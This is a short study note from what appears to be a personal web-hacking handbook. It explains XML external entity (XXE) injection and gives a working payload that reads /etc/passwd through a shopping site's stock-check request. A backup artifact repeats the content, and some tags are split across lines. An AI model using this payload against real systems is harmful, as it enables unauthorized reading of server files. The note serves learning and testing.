handbook/tools/3.Web-Hacking/4.Injection/XXE/Commands/1.XXE-Retrieve-Files.md


## Exploiting XXE to Retrieve Files

- Need to modify submitted XML in two ways
	- Introduce (or edit) a DOCTYPE element that defines an external entity containing the path to a file.
	- Edit a data value in the XML that is returned in the application's response, to make use of the defined external entity.

- Example -- shopping application checking for stock by submitting the following XML:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>381</productId><
/stockCheck>
```

- Exploit
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM
"file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></st
ockCheck>
```

Define an external entity (&xxe;) whose value is the contents of /etc/passwd and uses the entity within the productId value
vault backup: 2024-08-31 01:07:21 2024-08-30 23:07:22 +00:00
			`## Exploiting XXE to Retrieve Files`

			`- Need to modify submitted XML in two ways`
			`- Introduce (or edit) a DOCTYPE element that defines an external entity containing the path to a file.`
			`- Edit a data value in the XML that is returned in the application's response, to make use of the defined external entity.`

			`- Example -- shopping application checking for stock by submitting the following XML:`
			```xml
			`<?xml version="1.0" encoding="UTF-8"?>`
			`<stockCheck><productId>381</productId><`
			`/stockCheck>`
			```

			`- Exploit`
			```xml
			`<?xml version="1.0" encoding="UTF-8"?>`
			`<!DOCTYPE foo [ <!ENTITY xxe SYSTEM`
			`"file:///etc/passwd"> ]>`
			`<stockCheck><productId>&xxe;</productId></st`
			`ockCheck>`
			```

			`Define an external entity (&xxe;) whose value is the contents of /etc/passwd and uses the entity within the productId value`